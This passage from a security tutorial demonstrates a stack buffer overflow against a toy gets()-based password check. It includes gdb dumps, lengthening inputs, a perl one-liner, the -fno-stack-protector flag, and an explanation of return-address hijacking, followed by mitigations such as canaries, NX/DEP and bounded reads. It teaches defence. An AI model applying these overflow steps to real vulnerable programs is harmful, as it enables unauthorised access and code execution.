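/* Combine four consecutive bytes of memory into the 32-bit word that
 * gdb's x/x prints on a little-endian machine: the byte at the lowest
 * address ends up in the lowest-order position of the printed word. */
uint32_t little_endian_word(const unsigned char bytes[4])
{
    assert(bytes != 0);
    return (uint32_t)bytes[0]
         | (uint32_t)bytes[1] << 8
         | (uint32_t)bytes[2] << 16
         | (uint32_t)bytes[3] << 24;
}
```

Passing the four bytes ‘d’, ‘d’, ‘d’, NUL gives 0x00646464, and four ‘a’ bytes give 0x61616161, matching the words in the dump.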

Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check that the data it reads in
fits within the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing. These are known as unbounded functions because developers cannot predict
when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period when
security was not as imperative as it is today. They must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.
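
For comparison, here is a sketch of what a bounded read could look like using the standard fgets function, which takes the size of the destination and never writes past it. The helper name read_line_bounded and its return codes are my own choices for illustration, not something the example program uses:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Read one line into dst without ever writing more than dst_size bytes.
 * Returns 0 if the whole line fit, 1 if it had to be truncated, and
 * -1 on end of input or a read error. */
int read_line_bounded(FILE *in, char *dst, size_t dst_size)
{
    size_t len;
    int truncated = 0;

    assert(in != NULL && dst != NULL && dst_size > 0);

    if (fgets(dst, (int)dst_size, in) == NULL) {
        dst[0] = '\0';
        return -1;
    }

    len = strcspn(dst, "\n");
    if (dst[len] != '\n') {
        /* No newline was stored: throw away the rest of the line so the
         * leftover characters are not mistaken for the next input. */
        int c;
        while ((c = fgetc(in)) != '\n' && c != EOF) {
            truncated = 1;
        }
    }
    dst[len] = '\0';   /* strip the newline, if there was one */
    return truncated;
}
```

With a 20-byte destination, a 52-character line is cut to 19 characters plus the terminator and reported as truncated, instead of spilling into whatever sits next to the buffer.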

Taking a look at the hack

We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it
should, the first thing to try is to give it more data than the buffer can hold. The buffers are
20 characters, so let’s start with 30 characters:

msfuser@ubuntu:~$ gdb example.elf

.
.

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: ddddddddddddddd

Program received signal SIGINT, Interrupt.


0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2


Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x00006161

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000


0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

0x7fffffffde30: 0x00000000 0x00000000 0xffffdf08 0x00007fff

We can see clearly that there are 30 instances of ‘a’ in memory, even though we only set aside
space for 20 characters. We have overflowed the buffer, but not by enough to do anything: the
extra characters landed in the gap before realPassword, which still holds its original value.
Let’s keep going and try 40 instances of ‘a’:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

.
.

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x64646400 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20
characters and we wrote eight characters to the realPassword buffer, we need to write 12
more characters. So, let’s try again, but with 52 instances of ‘a’ this time:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

SUCCESS!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaaaaaaaaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x40072d

called by frame at 0x7fffffffde30


source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161


0x7fffffffde00: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde10: 0x61616161 0x00007f00 0x00000000 0x00000000

Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow
attack. In this case, we used it to alter variables within a program, but it can also be used to
alter metadata used to track program execution.
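
The three runs above can be reproduced without a real overflow by modelling the stack as a struct. This is only a sketch under assumptions: the 32-byte distance between the buffers is taken from the dump addresses (0x7fffffffde00 minus 0x7fffffffdde0), the 20-character comparison comes from the text, and the names frame_model, bytes_needed and simulate_login are hypothetical:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum {
    GIVEN_SLOT = 0x20, /* 0x7fffffffde00 - 0x7fffffffdde0 in the dumps */
    REAL_SLOT  = 20,   /* declared size of realPassword, per the text */
    TAIL_PAD   = 12,   /* room for the terminator past realPassword */
    COMPARED   = 20    /* characters the program compares, per the text */
};

/* Hypothetical model of the two buffers as they sit on the stack. */
struct frame_model {
    char given[GIVEN_SLOT];
    char real[REAL_SLOT];
    char tail[TAIL_PAD];
};

/* Input characters needed to fill every compared byte of realPassword. */
size_t bytes_needed(void)
{
    return offsetof(struct frame_model, real) + COMPARED;
}

/* Feed `count` copies of 'a' through an unbounded write.
 * Returns 1 for SUCCESS (buffers compare equal) and 0 for FAILURE. */
int simulate_login(size_t count)
{
    struct frame_model frame;
    unsigned char *raw = (unsigned char *)&frame;

    assert(count < sizeof frame);   /* keep the model itself in bounds */
    memset(&frame, 0, sizeof frame);
    memcpy(frame.real, "ddddddddddddddd", 16);   /* 15 'd's plus NUL */

    /* Like gets: start at givenPassword, keep writing, then add a NUL. */
    memset(raw, 'a', count);
    raw[count] = '\0';

    return strncmp(frame.given, frame.real, COMPARED) == 0;
}
```

In this model, 30 and 40 characters both fail and 52 succeeds, because 32 bytes are needed to reach realPassword and another 20 to fill the compared region.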

Altering metadata

Using stack overflow attacks against program metadata to affect code execution is not much
different than the above example. The key is understanding the concept of a return address.
Like us, computers do a lot of things at once and will stop working on one thing to do
another before returning to the original task. When the computer executes instructions
located somewhere else in instruction memory, it stores a note of where it was before it
starts executing so that it knows where to return when it finishes the new task. That note,
called the return address, is simply the address in instruction memory where it returns
and resumes executing instructions.

The computer trusts that note completely, so if you can change the value of the return
address, you can send it wherever you like. Exploits will often write the instructions in the
same buffer they overflow and then point execution back to the buffer itself, which allows an
attacker to hand a program code and then force it to execute the code.
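
To make the idea concrete without corrupting a real stack, the sketch below models the saved return address as a function pointer stored right after a buffer. Everything here (call_model, normal_return, attacker_target, run_model) is a hypothetical stand-in; a real exploit overwrites the return address the CPU saved, not a struct field:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*handler_fn)(void);

static int normal_return(void)   { return 0; } /* where we should go back to */
static int attacker_target(void) { return 1; } /* where the attacker wants us */

/* Hypothetical model: a buffer followed by the saved "return address". */
struct call_model {
    char buffer[16];
    handler_fn saved_return;
};

/* Copy input into the model the way an unbounded function would, then
 * "return" through the saved pointer. Returns 0 when control flow is
 * intact and 1 when it has been redirected. */
int run_model(int overflow)
{
    struct call_model model;
    unsigned char payload[sizeof model];
    size_t len = 8;                       /* a well-behaved input */

    memset(&model, 0, sizeof model);
    model.saved_return = normal_return;
    memset(payload, 'a', sizeof payload);

    if (overflow) {
        /* Filler up to the saved pointer, then the address we choose. */
        handler_fn target = attacker_target;
        size_t offset = offsetof(struct call_model, saved_return);
        memcpy(payload + offset, &target, sizeof target);
        len = offset + sizeof target;
    }

    assert(len <= sizeof model);          /* keep the model in bounds */
    memcpy(&model, payload, len);         /* no check against buffer size */
    return model.saved_return();
}
```

A short input leaves the pointer alone and the model returns normally; the long input replaces the pointer and execution lands in attacker_target instead.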

One caveat is that none of these examples will work as-is on remotely modern operating
systems with their default protections enabled. Operating system developers, application
developers, hardware engineers, and even compilers have all reacted and made performing
stack overflow attacks much harder.

What’s being done to mitigate these exploits?

It has been nearly 20 years since the heyday of stack overflow attacks, and there are a lot of
protections in place that prevent them from working as well now as they did back then.
Some of these protections include stack canaries, Address Space Layout Randomization
(ASLR), compiler warnings, and hardware changes to prevent execution of code on the
stack. (Side note: For a historical discussion on ASLR on Windows, see this most excellent
Twitter thread by John Lambert.)

First and foremost, the best defense against stack-based overflow attacks is the use of secure
coding practices—mostly through stopping the use of functions that allow for unbounded
memory access and carefully calculating memory access to prevent attackers from
modifying adjacent values in memory. Quite simply, if attackers can only access the
memory of the variable they intend to change, they cannot affect code execution beyond the
expectations of the developer and architect.

Unfortunately, there are thousands of programs that use the unsafe, unbounded
functions to access memory, and recoding all of them to meet secure coding practices is
simply not feasible. For those legacy programs, operating system manufacturers
implemented several mitigations to keep poor coding practices from resulting in arbitrary
code execution. We can see this in action somewhat in our example by toggling the
protections and pushing further in our overflow.

One quick change that compilers made in the immediate aftermath of the stack-based attacks
was starting to include protections on important pieces of data, such as return addresses.
Since most stack overflow attacks involved overflowing one data location and writing to
another, the compiler placed a sacrificial known value between buffers and important data,
then the program would check to see whether the sacrificial value had been changed before
using the important data. If that value had been changed, it was likely that the important
data was also altered, so execution would stop immediately. Since a change in these
sacrificial values could be determined before malicious code execution would start, the
values are known as “canaries.” If the canary was disturbed, exception code was executed
and the program terminated.
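
The check itself is simple enough to model in a few lines. The sketch below is not what GCC emits: the struct layout, the fixed MODEL_CANARY value and the function name are all assumptions made for illustration, and real canaries are normally chosen at run time rather than hard-coded:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical fixed canary for the model only. */
#define MODEL_CANARY UINT64_C(0x00c0ffee0badf00d)

/* Model of a protected frame: the canary sits between the buffer and
 * the data worth protecting. */
struct guarded_frame {
    char buffer[16];
    uint64_t canary;
    uint64_t saved_return;
};

/* Copy len bytes with no bounds check against buffer, then verify the
 * canary before "using" the saved return address.
 * Returns 0 if the canary is intact, -1 if smashing was detected. */
int copy_with_canary_check(const unsigned char *input, size_t len)
{
    struct guarded_frame frame;

    assert(input != NULL && len <= sizeof frame); /* keep the model in bounds */
    memset(&frame, 0, sizeof frame);
    frame.canary = MODEL_CANARY;
    frame.saved_return = UINT64_C(0x400701);

    memcpy(&frame, input, len);   /* the unbounded write */

    if (frame.canary != MODEL_CANARY) {
        return -1;                /* stop before the return address is used */
    }
    return 0;
}
```

Sixteen bytes of input fit in the buffer and pass the check. Even one byte more changes the canary, so the overflow is caught before the saved return address would be used.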

Now, stack canaries, by themselves, aren’t bulletproof, since there are a few ways to bypass
them. One method is finding the canary value through an unbounded read of memory or by
guessing. In some cases, canary values are static and predictable. Once attackers know the
canary value, they can replace it in the overwrite. For this reason, canaries often contain
characters that are difficult to send, such as “enter” (\x0a) or “vertical tab” (\x0b).
While a challenge for the attacker, this reduces the entropy of the canary value and makes
it easier to find in memory.

To disable the stack canary protections when compiling with the GNU Compiler Collection
(GCC), you must specify that you want the protections turned off, with the flag
‘-fno-stack-protector’.

To demonstrate, let’s compile the program without protections and pass it a large buffer. In
this case, I am using a small inline perl script to generate a series of 90 instances of ‘a’ and
pass that into the program example.elf:

msfuser@ubuntu:~$ gcc -o example.elf -fno-stack-protector overwrite.c

.
msfuser@ubuntu:~$ perl -e 'print "a"x90' | ./example.elf

SUCCESS!

givenPassword:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaa

realPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Segmentation fault (core dumped)

This resulted in a program crash, which is expected when memory structures are corrupted
with bad data. This is likely the result of overwriting the return address, after which the
processor faulted when it tried to execute from the bogus location. If we’d overwritten the
return address with somewhere that the CPU could access, it would have been happy to go there.

Now let’s redo the experiment, but without disabling the gcc stack protections:

msfuser@ubuntu:~$ gcc -o example.elf overwrite.c


overwrite.c: In function ‘main’:

msfuser@ubuntu:~$ perl -e 'print "a"x90' | ./example.elf

FAILURE!

givenPassword:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaa

realPassword: ddddddddddddddd
*** stack smashing detected ***: ./example.elf terminated

Aborted (core dumped)

msfuser@ubuntu:~$

Changes to hardware and operating systems took longer, but they did happen. One of the
first mitigations introduced by hardware and operating system vendors was the NX, or
no-execute, bit. On Windows, the feature built on it is known as Data Execution Prevention
(DEP). It allowed operating systems to define certain areas of memory as non-executable, and
when flagged as such, the CPU would simply not execute that memory. In theory, there should
never be executable code on the stack, as it is designed for storing data values only. Based
on that understanding, operating systems classified the stack as non-executable, preventing
arbitrary code from being placed on the stack and executed.
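
On Linux, one way to see this for yourself is the /proc/self/maps file, where each line lists an address range followed by a four-character permission field such as rw-p or rwxp. The sketch below assumes Linux, and both function names are my own; it simply reports whether the line tagged [stack] carries the execute permission:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse one /proc/<pid>/maps line ("range perms offset dev inode path").
 * Returns 1 if the mapping is executable, 0 if it is not, and -1 if
 * the permission field cannot be read. */
int maps_line_is_executable(const char *line)
{
    char perms[5];

    assert(line != NULL);
    if (sscanf(line, "%*s %4s", perms) != 1 || strlen(perms) != 4) {
        return -1;
    }
    return perms[2] == 'x';   /* field layout is r, w, x, then p or s */
}

/* Look up the current process's [stack] mapping (Linux only).
 * Returns 1, 0, or -1 with the same meaning as above. */
int stack_is_executable(void)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    int result = -1;

    if (maps == NULL) {
        return -1;
    }
    while (fgets(line, sizeof line, maps) != NULL) {
        if (strstr(line, "[stack]") != NULL) {
            result = maps_line_is_executable(line);
            break;
        }
    }
    fclose(maps);
    return result;
}
```

Calling stack_is_executable() from a small test program and printing the result shows whether the stack of that process was mapped with execute permission.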
